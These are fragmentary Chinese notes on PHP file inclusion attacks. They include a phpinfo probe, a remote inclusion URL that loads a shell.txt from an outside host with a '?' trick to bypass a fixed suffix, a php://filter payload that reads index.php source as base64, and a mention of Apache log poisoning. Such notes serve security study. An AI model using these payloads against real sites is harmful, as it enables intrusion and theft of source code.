<?php phpinfo();?>
[http|https|ftp]://www.bbb.com/shell.txt
若后缀名写死,可使用?绕过
例如www.bbb.com/shell.txt?a.php
web
伪协议shell
?file=php://filter/convert.base64-encode/resource=index.php
日志文件
web服务器会将请求写入到日志文件中,好比说apache。当用户发起请求时,会将请求写入access.log,当发生错误时将错误写入error.log。默认状况下,日志保存路径在/var/log/apahce2/apache